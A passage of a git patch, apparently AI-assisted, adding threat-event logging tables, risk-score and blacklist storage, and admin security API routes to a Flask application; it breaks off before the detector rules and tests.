From 46253337ebe96169eae4577a2c0fb3bc58f164df Mon Sep 17 00:00:00 2001 From: yuyx <237899745@qq.com> Date: Sat, 27 Dec 2025 01:28:38 +0800 Subject: [PATCH] =?UTF-8?q?feat:=20=E5=AE=9E=E7=8E=B0=E5=AE=8C=E6=95=B4?= =?UTF-8?q?=E5=AE=89=E5=85=A8=E9=98=B2=E6=8A=A4=E7=B3=BB=E7=BB=9F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Phase 1 - 威胁检测引擎: - security/threat_detector.py: JNDI/SQL/XSS/路径遍历/命令注入检测 - security/constants.py: 威胁检测规则和评分常量 - 数据库表: threat_events, ip_risk_scores, user_risk_scores, ip_blacklist Phase 2 - 风险评分与黑名单: - security/risk_scorer.py: IP/用户风险评分引擎,支持分数衰减 - security/blacklist.py: 黑名单管理,自动封禁规则 Phase 3 - 响应策略: - security/honeypot.py: 蜜罐响应生成器 - security/response_handler.py: 渐进式响应策略 Phase 4 - 集成: - security/middleware.py: Flask安全中间件 - routes/admin_api/security.py: 管理后台安全仪表板API - 36个测试用例全部通过 🤖 Generated with [Claude Code](https://claude.com/claude-code) Co-Authored-By: Claude Opus 4.5 --- app.py | 4 + app_config.py | 7 + database.py | 2 +- db/migrations.py | 120 ++++++++++ db/schema.py | 115 ++++++++++ db/security.py | 218 +++++++++++++++++- routes/__init__.py | 4 + routes/admin_api/__init__.py | 3 + routes/admin_api/security.py | 334 +++++++++++++++++++++++++++ routes/decorators.py | 13 +- security/__init__.py | 22 ++ security/blacklist.py | 255 +++++++++++++++++++++ security/constants.py | 97 ++++++++ security/honeypot.py | 126 +++++++++++ security/middleware.py | 307 +++++++++++++++++++++++++ security/response_handler.py | 131 +++++++++++ security/risk_scorer.py | 362 ++++++++++++++++++++++++++++++ security/threat_detector.py | 316 ++++++++++++++++++++++++++ tests/test_admin_security_api.py | 249 ++++++++++++++++++++ tests/test_honeypot_responder.py | 63 ++++++ tests/test_response_handler.py | 72 ++++++ tests/test_risk_scorer.py | 179 +++++++++++++++ tests/test_security_middleware.py | 155 +++++++++++++ tests/test_threat_detector.py | 69 ++++++ 24 files changed, 3219 insertions(+), 4 deletions(-) create mode 100644 routes/admin_api/security.py create mode 100644 security/__init__.py create mode 100644 security/blacklist.py create mode 100644 security/constants.py create mode 100644 security/honeypot.py create mode 100644 security/middleware.py create mode 100644 security/response_handler.py create mode 100644 security/risk_scorer.py create mode 100644 security/threat_detector.py create mode 100644 tests/test_admin_security_api.py create mode 100644 tests/test_honeypot_responder.py create mode 100644 tests/test_response_handler.py create mode 100644 tests/test_risk_scorer.py create mode 100644 tests/test_security_middleware.py create mode 100644 tests/test_threat_detector.py diff --git a/app.py b/app.py index d4d8e54..db1d816 100644 --- a/app.py +++ b/app.py @@ -32,6 +32,7 @@ from browser_pool_worker import init_browser_worker_pool, shutdown_browser_worke from realtime.socketio_handlers import register_socketio_handlers from realtime.status_push import status_push_worker from routes import register_blueprints +from security import init_security_middleware from services.browser_manager import init_browser_manager from services.checkpoints import init_checkpoint_manager from services.maintenance import start_cleanup_scheduler @@ -98,6 +99,9 @@ init_logging(log_level=config.LOG_LEVEL, log_file=config.LOG_FILE) logger = get_logger("app") init_runtime(socketio=socketio, logger=logger) +# 初始化安全中间件(需在其他中间件/Blueprint 之前注册) +init_security_middleware(app) + # 注册 Blueprint(路由不变) register_blueprints(app) diff --git a/app_config.py b/app_config.py index 4893842..f376fb5 100755 --- a/app_config.py +++ b/app_config.py @@ -206,6 +206,10 @@ class Config: LOGIN_ALERT_ENABLED = os.environ.get('LOGIN_ALERT_ENABLED', 'true').lower() == 'true' LOGIN_ALERT_MIN_INTERVAL_SECONDS = int(os.environ.get('LOGIN_ALERT_MIN_INTERVAL_SECONDS', '3600')) ADMIN_REAUTH_WINDOW_SECONDS = int(os.environ.get('ADMIN_REAUTH_WINDOW_SECONDS', '600')) + SECURITY_ENABLED = os.environ.get('SECURITY_ENABLED', 'true').lower() == 'true' + SECURITY_LOG_LEVEL = os.environ.get('SECURITY_LOG_LEVEL', 'INFO') + HONEYPOT_ENABLED = os.environ.get('HONEYPOT_ENABLED', 'true').lower() == 'true' + AUTO_BAN_ENABLED = os.environ.get('AUTO_BAN_ENABLED', 'true').lower() == 'true' @classmethod def validate(cls): @@ -234,6 +238,9 @@ class Config: if cls.LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']: errors.append(f"LOG_LEVEL无效: {cls.LOG_LEVEL}") + if cls.SECURITY_LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']: + errors.append(f"SECURITY_LOG_LEVEL无效: {cls.SECURITY_LOG_LEVEL}") + return errors @classmethod diff --git a/database.py b/database.py index 550b99a..28509b2 100644 --- a/database.py +++ b/database.py @@ -121,7 +121,7 @@ config = get_config() DB_FILE = config.DB_FILE # 数据库版本 (用于迁移管理) -DB_VERSION = 12 +DB_VERSION = 14 # ==================== 系统配置缓存(P1 / O-03) ==================== diff --git a/db/migrations.py b/db/migrations.py index 91e588c..7d8d429 100644 --- a/db/migrations.py +++ b/db/migrations.py @@ -72,6 +72,12 @@ def migrate_database(conn, target_version: int) -> None: if current_version < 12: _migrate_to_v12(conn) current_version = 12 + if current_version < 13: + _migrate_to_v13(conn) + current_version = 13 + if current_version < 14: + _migrate_to_v14(conn) + current_version = 14 if current_version != int(target_version): set_current_version(conn, int(target_version)) @@ -519,3 +525,117 @@ def _migrate_to_v12(conn): cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)") conn.commit() + + +def _migrate_to_v13(conn): + """迁移到版本13 - 安全防护:威胁检测相关表""" + cursor = conn.cursor() + + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS threat_events ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + threat_type TEXT NOT NULL, + score INTEGER NOT NULL DEFAULT 0, + rule TEXT, + field_name TEXT, + matched TEXT, + value_preview TEXT, + ip TEXT, + user_id INTEGER, + request_method TEXT, + request_path TEXT, + user_agent TEXT, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE + ) + """ + ) + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_created_at ON threat_events(created_at)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_ip ON threat_events(ip)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_user_id ON threat_events(user_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_type ON threat_events(threat_type)") + + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS ip_risk_scores ( + ip TEXT PRIMARY KEY, + risk_score INTEGER NOT NULL DEFAULT 0, + last_seen TIMESTAMP, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP + ) + """ + ) + cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_score ON ip_risk_scores(risk_score)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_updated_at ON ip_risk_scores(updated_at)") + + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS user_risk_scores ( + user_id INTEGER PRIMARY KEY, + risk_score INTEGER NOT NULL DEFAULT 0, + last_seen TIMESTAMP, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE + ) + """ + ) + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_score ON user_risk_scores(risk_score)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_updated_at ON user_risk_scores(updated_at)") + + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS ip_blacklist ( + ip TEXT PRIMARY KEY, + reason TEXT, + is_active INTEGER DEFAULT 1, + added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + expires_at TIMESTAMP + ) + """ + ) + cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_active ON ip_blacklist(is_active)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_expires ON ip_blacklist(expires_at)") + + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS threat_signatures ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + name TEXT UNIQUE NOT NULL, + threat_type TEXT NOT NULL, + pattern TEXT NOT NULL, + pattern_type TEXT DEFAULT 'regex', + score INTEGER DEFAULT 0, + is_active INTEGER DEFAULT 1, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP + ) + """ + ) + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_type ON threat_signatures(threat_type)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_active ON threat_signatures(is_active)") + + conn.commit() + + +def _migrate_to_v14(conn): + """迁移到版本14 - 安全防护:用户黑名单表""" + cursor = conn.cursor() + + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS user_blacklist ( + user_id INTEGER PRIMARY KEY, + reason TEXT, + is_active INTEGER DEFAULT 1, + added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + expires_at TIMESTAMP + ) + """ + ) + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)") + + conn.commit() diff --git a/db/schema.py b/db/schema.py index 73bd377..f4f5589 100644 --- a/db/schema.py +++ b/db/schema.py @@ -72,6 +72,101 @@ def ensure_schema(conn) -> None: """ ) + # ==================== 安全防护:威胁检测相关表 ==================== + + # 威胁事件日志表 + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS threat_events ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + threat_type TEXT NOT NULL, + score INTEGER NOT NULL DEFAULT 0, + rule TEXT, + field_name TEXT, + matched TEXT, + value_preview TEXT, + ip TEXT, + user_id INTEGER, + request_method TEXT, + request_path TEXT, + user_agent TEXT, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE + ) + """ + ) + + # IP风险评分表 + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS ip_risk_scores ( + ip TEXT PRIMARY KEY, + risk_score INTEGER NOT NULL DEFAULT 0, + last_seen TIMESTAMP, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP + ) + """ + ) + + # 用户风险评分表 + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS user_risk_scores ( + user_id INTEGER PRIMARY KEY, + risk_score INTEGER NOT NULL DEFAULT 0, + last_seen TIMESTAMP, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE + ) + """ + ) + + # IP黑名单表 + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS ip_blacklist ( + ip TEXT PRIMARY KEY, + reason TEXT, + is_active INTEGER DEFAULT 1, + added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + expires_at TIMESTAMP + ) + """ + ) + + # 用户黑名单表 + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS user_blacklist ( + user_id INTEGER PRIMARY KEY, + reason TEXT, + is_active INTEGER DEFAULT 1, + added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + expires_at TIMESTAMP, + FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE + ) + """ + ) + + # 威胁特征库表 + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS threat_signatures ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + name TEXT UNIQUE NOT NULL, + threat_type TEXT NOT NULL, + pattern TEXT NOT NULL, + pattern_type TEXT DEFAULT 'regex', + score INTEGER DEFAULT 0, + is_active INTEGER DEFAULT 1, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP + ) + """ + ) + # 账号表(关联用户) cursor.execute( """ @@ -271,6 +366,26 @@ def ensure_schema(conn) -> None: cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_fingerprints_user ON login_fingerprints(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_created_at ON threat_events(created_at)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_ip ON threat_events(ip)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_user_id ON threat_events(user_id)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_type ON threat_events(threat_type)") + + cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_score ON ip_risk_scores(risk_score)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_updated_at ON ip_risk_scores(updated_at)") + + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_score ON user_risk_scores(risk_score)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_updated_at ON user_risk_scores(updated_at)") + + cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_active ON ip_blacklist(is_active)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_expires ON ip_blacklist(expires_at)") + + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)") + + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_type ON threat_signatures(threat_type)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_active ON threat_signatures(is_active)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_user_id ON accounts(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_accounts_username ON accounts(username)") diff --git a/db/security.py b/db/security.py index a57b2d2..79ad0f3 100644 --- a/db/security.py +++ b/db/security.py @@ -2,10 +2,12 @@ # -*- coding: utf-8 -*- from __future__ import annotations +from datetime import timedelta +from typing import Any, Optional from typing import Dict import db_pool -from db.utils import get_cst_now_str +from db.utils import get_cst_now, get_cst_now_str def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict[str, bool]: @@ -74,3 +76,217 @@ def record_login_context(user_id: int, ip_address: str, user_agent: str) -> Dict conn.commit() return {"new_device": new_device, "new_ip": new_ip} + + +def get_threat_events_count(hours: int = 24) -> int: + """获取指定时间内的威胁事件数。""" + try: + hours_int = max(0, int(hours)) + except Exception: + hours_int = 24 + + if hours_int <= 0: + return 0 + + start_time = (get_cst_now() - timedelta(hours=hours_int)).strftime("%Y-%m-%d %H:%M:%S") + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute("SELECT COUNT(*) AS cnt FROM threat_events WHERE created_at >= ?", (start_time,)) + row = cursor.fetchone() + try: + return int(row["cnt"] if row else 0) + except Exception: + return 0 + + +def _build_threat_events_where_clause(filters: Optional[dict]) -> tuple[str, list[Any]]: + clauses: list[str] = [] + params: list[Any] = [] + + if not isinstance(filters, dict): + return "", [] + + event_type = filters.get("event_type") or filters.get("threat_type") + if event_type: + raw = str(event_type).strip() + types = [t.strip()[:64] for t in raw.split(",") if t.strip()] + if len(types) == 1: + clauses.append("threat_type = ?") + params.append(types[0]) + elif types: + placeholders = ", ".join(["?"] * len(types)) + clauses.append(f"threat_type IN ({placeholders})") + params.extend(types) + + severity = filters.get("severity") + if severity is not None and str(severity).strip(): + sev = str(severity).strip().lower() + if "-" in sev: + parts = [p.strip() for p in sev.split("-", 1)] + try: + min_score = int(parts[0]) + max_score = int(parts[1]) + clauses.append("score >= ? AND score <= ?") + params.extend([min_score, max_score]) + except Exception: + pass + elif sev.isdigit(): + clauses.append("score >= ?") + params.append(int(sev)) + elif sev in {"high", "critical"}: + clauses.append("score >= ?") + params.append(80) + elif sev in {"medium", "med"}: + clauses.append("score >= ? AND score < ?") + params.extend([50, 80]) + elif sev in {"low", "info"}: + clauses.append("score < ?") + params.append(50) + + ip = filters.get("ip") + if ip is not None and str(ip).strip(): + ip_text = str(ip).strip()[:64] + clauses.append("ip = ?") + params.append(ip_text) + + user_id = filters.get("user_id") + if user_id is not None and str(user_id).strip(): + try: + user_id_int = int(user_id) + except Exception: + user_id_int = None + if user_id_int is not None: + clauses.append("user_id = ?") + params.append(user_id_int) + + if not clauses: + return "", [] + return " WHERE " + " AND ".join(clauses), params + + +def get_threat_events_list(page: int, per_page: int, filters: Optional[dict] = None) -> dict: + """分页获取威胁事件。""" + try: + page_i = max(1, int(page)) + except Exception: + page_i = 1 + try: + per_page_i = int(per_page) + except Exception: + per_page_i = 20 + per_page_i = max(1, min(200, per_page_i)) + + where_sql, params = _build_threat_events_where_clause(filters) + offset = (page_i - 1) * per_page_i + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute(f"SELECT COUNT(*) AS cnt FROM threat_events{where_sql}", tuple(params)) + row = cursor.fetchone() + total = int(row["cnt"]) if row else 0 + + cursor.execute( + f""" + SELECT + id, + threat_type, + score, + rule, + field_name, + matched, + value_preview, + ip, + user_id, + request_method, + request_path, + user_agent, + created_at + FROM threat_events + {where_sql} + ORDER BY created_at DESC, id DESC + LIMIT ? OFFSET ? + """, + tuple(params + [per_page_i, offset]), + ) + items = [dict(r) for r in cursor.fetchall()] + + return {"page": page_i, "per_page": per_page_i, "total": total, "items": items, "filters": filters or {}} + + +def get_ip_threat_history(ip: str, limit: int = 50) -> list[dict]: + """获取IP的威胁历史(最近limit条)。""" + ip_text = str(ip or "").strip()[:64] + if not ip_text: + return [] + try: + limit_i = max(1, min(200, int(limit))) + except Exception: + limit_i = 50 + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + SELECT + id, + threat_type, + score, + rule, + field_name, + matched, + value_preview, + ip, + user_id, + request_method, + request_path, + user_agent, + created_at + FROM threat_events + WHERE ip = ? + ORDER BY created_at DESC, id DESC + LIMIT ? + """, + (ip_text, limit_i), + ) + return [dict(r) for r in cursor.fetchall()] + + +def get_user_threat_history(user_id: int, limit: int = 50) -> list[dict]: + """获取用户的威胁历史(最近limit条)。""" + if user_id is None: + return [] + try: + user_id_int = int(user_id) + except Exception: + return [] + try: + limit_i = max(1, min(200, int(limit))) + except Exception: + limit_i = 50 + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + SELECT + id, + threat_type, + score, + rule, + field_name, + matched, + value_preview, + ip, + user_id, + request_method, + request_path, + user_agent, + created_at + FROM threat_events + WHERE user_id = ? + ORDER BY created_at DESC, id DESC + LIMIT ? + """, + (user_id_int, limit_i), + ) + return [dict(r) for r in cursor.fetchall()] diff --git a/routes/__init__.py b/routes/__init__.py index 1327246..439daa9 100644 --- a/routes/__init__.py +++ b/routes/__init__.py @@ -5,6 +5,7 @@ from __future__ import annotations def register_blueprints(app) -> None: from routes.admin_api import admin_api_bp + from routes.admin_api import security_bp as admin_security_bp from routes.api_accounts import api_accounts_bp from routes.api_auth import api_auth_bp from routes.api_schedules import api_schedules_bp @@ -21,3 +22,6 @@ def register_blueprints(app) -> None: app.register_blueprint(api_screenshots_bp) app.register_blueprint(api_schedules_bp) app.register_blueprint(admin_api_bp) + # Security admin APIs (support both /api/admin/* and /yuyx/api/admin/*) + app.register_blueprint(admin_security_bp) + app.register_blueprint(admin_security_bp, url_prefix="/yuyx", name="admin_security_yuyx") diff --git a/routes/admin_api/__init__.py b/routes/admin_api/__init__.py index c5e56f8..62bff1c 100644 --- a/routes/admin_api/__init__.py +++ b/routes/admin_api/__init__.py @@ -9,3 +9,6 @@ admin_api_bp = Blueprint("admin_api", __name__, url_prefix="/yuyx/api") # Import side effects: register routes on blueprint from routes.admin_api import core as _core # noqa: F401 from routes.admin_api import update as _update # noqa: F401 + +# Export security blueprint for app registration +from routes.admin_api.security import security_bp # noqa: F401 diff --git a/routes/admin_api/security.py b/routes/admin_api/security.py new file mode 100644 index 0000000..9cc67be --- /dev/null +++ b/routes/admin_api/security.py @@ -0,0 +1,334 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +from typing import Any + +from flask import Blueprint, jsonify, request + +import db_pool +from db import security as security_db +from routes.decorators import admin_required +from security import BlacklistManager, RiskScorer + +security_bp = Blueprint("admin_security", __name__) +blacklist = BlacklistManager() +scorer = RiskScorer(blacklist_manager=blacklist) + + +def _truncate(value: Any, max_len: int = 200) -> str: + text = str(value or "") + if max_len <= 0: + return "" + if len(text) <= max_len: + return text + return text[: max(0, max_len - 3)] + "..." + + +def _parse_int_arg(name: str, default: int, *, min_value: int | None = None, max_value: int | None = None) -> int: + raw = request.args.get(name, None) + if raw is None or str(raw).strip() == "": + value = int(default) + else: + try: + value = int(str(raw).strip()) + except Exception: + value = int(default) + + if min_value is not None: + value = max(int(min_value), value) + if max_value is not None: + value = min(int(max_value), value) + return value + + +def _parse_json() -> dict: + if request.is_json: + data = request.get_json(silent=True) or {} + return data if isinstance(data, dict) else {} + # 兼容 form-data + try: + return dict(request.form or {}) + except Exception: + return {} + + +def _parse_bool(value: Any) -> bool: + if isinstance(value, bool): + return value + if isinstance(value, int): + return value != 0 + text = str(value or "").strip().lower() + return text in {"1", "true", "yes", "y", "on"} + + +def _sanitize_threat_event(event: dict) -> dict: + return { + "id": event.get("id"), + "threat_type": event.get("threat_type") or "unknown", + "score": int(event.get("score") or 0), + "ip": _truncate(event.get("ip"), 64), + "user_id": event.get("user_id"), + "request_method": _truncate(event.get("request_method"), 16), + "request_path": _truncate(event.get("request_path"), 256), + "field_name": _truncate(event.get("field_name"), 80), + "rule": _truncate(event.get("rule"), 120), + "matched": _truncate(event.get("matched"), 120), + "value_preview": _truncate(event.get("value_preview"), 200), + "created_at": event.get("created_at"), + } + + +def _sanitize_ban_entry(entry: dict, *, kind: str) -> dict: + if kind == "ip": + return { + "ip": _truncate(entry.get("ip"), 64), + "reason": _truncate(entry.get("reason"), 200), + "added_at": entry.get("added_at"), + "expires_at": entry.get("expires_at"), + "is_active": int(entry.get("is_active") or 0), + } + if kind == "user": + return { + "user_id": entry.get("user_id"), + "reason": _truncate(entry.get("reason"), 200), + "added_at": entry.get("added_at"), + "expires_at": entry.get("expires_at"), + "is_active": int(entry.get("is_active") or 0), + } + return {} + + +@security_bp.route("/api/admin/security/dashboard", methods=["GET"]) +@admin_required +def get_security_dashboard(): + """ + 获取安全仪表板数据 + 返回: + - 最近24小时威胁事件数 + - 当前封禁IP数 + - 当前封禁用户数 + - 最近10条威胁事件 + """ + try: + threat_24h = security_db.get_threat_events_count(hours=24) + except Exception: + threat_24h = 0 + + try: + banned_ips = blacklist.get_banned_ips() + except Exception: + banned_ips = [] + + try: + banned_users = blacklist.get_banned_users() + except Exception: + banned_users = [] + + try: + recent = security_db.get_threat_events_list(page=1, per_page=10, filters={}).get("items", []) + recent_items = [_sanitize_threat_event(e) for e in recent if isinstance(e, dict)] + except Exception: + recent_items = [] + + return jsonify( + { + "threat_events_24h": int(threat_24h or 0), + "banned_ip_count": len(banned_ips), + "banned_user_count": len(banned_users), + "recent_threat_events": recent_items, + } + ) + + +@security_bp.route("/api/admin/security/threats", methods=["GET"]) +@admin_required +def get_threat_events(): + """ + 获取威胁事件列表(分页) + 参数: page, per_page, severity, event_type + """ + page = _parse_int_arg("page", 1, min_value=1, max_value=100000) + per_page = _parse_int_arg("per_page", 20, min_value=1, max_value=200) + severity = (request.args.get("severity") or "").strip() + event_type = (request.args.get("event_type") or "").strip() + + filters: dict[str, Any] = {} + if severity: + filters["severity"] = severity + if event_type: + filters["event_type"] = event_type + + data = security_db.get_threat_events_list(page, per_page, filters) + items = data.get("items") or [] + data["items"] = [_sanitize_threat_event(e) for e in items if isinstance(e, dict)] + return jsonify(data) + + +@security_bp.route("/api/admin/security/banned-ips", methods=["GET"]) +@admin_required +def get_banned_ips(): + """获取封禁IP列表""" + items = blacklist.get_banned_ips() + return jsonify({"count": len(items), "items": [_sanitize_ban_entry(x, kind="ip") for x in items]}) + + +@security_bp.route("/api/admin/security/banned-users", methods=["GET"]) +@admin_required +def get_banned_users(): + """获取封禁用户列表""" + items = blacklist.get_banned_users() + return jsonify({"count": len(items), "items": [_sanitize_ban_entry(x, kind="user") for x in items]}) + + +@security_bp.route("/api/admin/security/ban-ip", methods=["POST"]) +@admin_required +def ban_ip(): + """ + 手动封禁IP + 参数: ip, reason, duration_hours(可选), permanent(可选) + """ + data = _parse_json() + ip = str(data.get("ip") or "").strip() + reason = str(data.get("reason") or "").strip() + duration_hours_raw = data.get("duration_hours", 24) + permanent = _parse_bool(data.get("permanent", False)) + + if not ip: + return jsonify({"error": "ip不能为空"}), 400 + if not reason: + return jsonify({"error": "reason不能为空"}), 400 + + try: + duration_hours = max(1, int(duration_hours_raw)) + except Exception: + duration_hours = 24 + + ok = blacklist.ban_ip(ip, reason, duration_hours=duration_hours, permanent=permanent) + if not ok: + return jsonify({"error": "封禁失败"}), 400 + return jsonify({"success": True}) + + +@security_bp.route("/api/admin/security/unban-ip", methods=["POST"]) +@admin_required +def unban_ip(): + """解除IP封禁""" + data = _parse_json() + ip = str(data.get("ip") or "").strip() + if not ip: + return jsonify({"error": "ip不能为空"}), 400 + + ok = blacklist.unban_ip(ip) + if not ok: + return jsonify({"error": "未找到封禁记录"}), 404 + return jsonify({"success": True}) + + +@security_bp.route("/api/admin/security/ban-user", methods=["POST"]) +@admin_required +def ban_user(): + """手动封禁用户""" + data = _parse_json() + user_id_raw = data.get("user_id") + reason = str(data.get("reason") or "").strip() + duration_hours_raw = data.get("duration_hours", 24) + permanent = _parse_bool(data.get("permanent", False)) + + try: + user_id = int(user_id_raw) + except Exception: + user_id = None + + if user_id is None: + return jsonify({"error": "user_id不能为空"}), 400 + if not reason: + return jsonify({"error": "reason不能为空"}), 400 + + try: + duration_hours = max(1, int(duration_hours_raw)) + except Exception: + duration_hours = 24 + + ok = blacklist._ban_user_internal(user_id, reason=reason, duration_hours=duration_hours, permanent=permanent) + if not ok: + return jsonify({"error": "封禁失败"}), 400 + return jsonify({"success": True}) + + +@security_bp.route("/api/admin/security/unban-user", methods=["POST"]) +@admin_required +def unban_user(): + """解除用户封禁""" + data = _parse_json() + user_id_raw = data.get("user_id") + try: + user_id = int(user_id_raw) + except Exception: + user_id = None + + if user_id is None: + return jsonify({"error": "user_id不能为空"}), 400 + + ok = blacklist.unban_user(user_id) + if not ok: + return jsonify({"error": "未找到封禁记录"}), 404 + return jsonify({"success": True}) + + +@security_bp.route("/api/admin/security/ip-risk/", methods=["GET"]) +@admin_required +def get_ip_risk(ip): + """获取指定IP的风险评分和历史事件""" + ip_text = str(ip or "").strip() + if not ip_text: + return jsonify({"error": "ip不能为空"}), 400 + + history = security_db.get_ip_threat_history(ip_text) + return jsonify( + { + "ip": _truncate(ip_text, 64), + "risk_score": int(scorer.get_ip_score(ip_text) or 0), + "is_banned": bool(blacklist.is_ip_banned(ip_text)), + "threat_history": [_sanitize_threat_event(e) for e in history if isinstance(e, dict)], + } + ) + + +@security_bp.route("/api/admin/security/user-risk/", methods=["GET"]) +@admin_required +def get_user_risk(user_id): + """获取指定用户的风险评分和历史事件""" + history = security_db.get_user_threat_history(user_id) + return jsonify( + { + "user_id": int(user_id), + "risk_score": int(scorer.get_user_score(user_id) or 0), + "is_banned": bool(blacklist.is_user_banned(user_id)), + "threat_history": [_sanitize_threat_event(e) for e in history if isinstance(e, dict)], + } + ) + + +@security_bp.route("/api/admin/security/cleanup", methods=["POST"]) +@admin_required +def cleanup_expired(): + """清理过期的封禁记录和衰减风险分""" + try: + blacklist.cleanup_expired() + except Exception: + pass + try: + scorer.decay_scores() + except Exception: + pass + + # 可选:返回当前连接池统计信息,便于排查后台运行状态 + pool_stats = None + try: + pool_stats = db_pool.get_pool_stats() + except Exception: + pool_stats = None + + return jsonify({"success": True, "pool_stats": pool_stats}) + diff --git a/routes/decorators.py b/routes/decorators.py index 798babf..f99f9c3 100644 --- a/routes/decorators.py +++ b/routes/decorators.py @@ -14,11 +14,20 @@ def admin_required(f): @wraps(f) def decorated_function(*args, **kwargs): - logger = get_logger() + try: + logger = get_logger() + except Exception: + import logging + + logger = logging.getLogger("app") logger.debug(f"[admin_required] 检查会话,admin_id存在: {'admin_id' in session}") if "admin_id" not in session: logger.warning(f"[admin_required] 拒绝访问 {request.path} - session中无admin_id") - is_api = request.blueprint == "admin_api" or request.path.startswith("/yuyx/api") + is_api = ( + request.blueprint in {"admin_api", "admin_security", "admin_security_yuyx"} + or request.path.startswith("/yuyx/api") + or request.path.startswith("/api/admin") + ) if is_api: return jsonify({"error": "需要管理员权限"}), 403 return redirect(url_for("pages.admin_login_page")) diff --git a/security/__init__.py b/security/__init__.py new file mode 100644 index 0000000..a82f31c --- /dev/null +++ b/security/__init__.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +from security.blacklist import BlacklistManager +from security.honeypot import HoneypotResponder +from security.middleware import init_security_middleware +from security.response_handler import ResponseAction, ResponseHandler, ResponseStrategy +from security.risk_scorer import RiskScorer +from security.threat_detector import ThreatDetector, ThreatResult + +__all__ = [ + 